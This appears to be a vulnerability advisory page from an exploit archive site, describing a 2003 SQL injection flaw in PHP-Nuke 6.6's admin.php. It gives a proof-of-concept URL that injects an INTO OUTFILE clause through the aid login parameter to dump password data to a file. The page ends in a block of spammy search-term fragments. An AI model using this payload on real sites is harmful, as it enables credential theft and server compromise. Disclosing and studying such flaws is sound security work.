about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP-Nuke admin.php SQL Injection Vulnerability


Title PHP-Nuke admin.php SQL Injection Vulnerability
Published 2003-10-08-12:00AM
Updated 2003-12-21-12:00AM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  The disclosure of this issue has been credited to 1dt.w0lf <idtwolf_at_sigaret.net>.
Vulnerable  Francisco Burzi PHPNuke 6.6
Not Vulnerable  
Code   The following proof of concept was provided:

http://www.example.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt

The following exploit code has been provided: /data/vulnerabilities/exploits/phpnuke_sql_exp.pl
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 09:55:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
2.4.25 www.indian exbb kon PHP 4.3.3 Pornpiture kon cisco Expl GRUB nude india www+dewasa www.nfbm.c pro evolut News Www.aseans /search/ex www.mqdm.n PA168 mianfeidai news for c jiumi.net www.daoba. www.mqdm.n Pop_Profil 250wyt.cn/ www.amoswe word+press localhost kernel 2.6 Apache htt www.aiaobi Lezbian fr www.solary com_extcal news for c www.qingse bbs.vcoole www.pornx. shop.zhuji www.usgays lo708l bullteproo vist x64 opens Www.ponese nude india php-nuke 2 www.tshua. phpBB www.videos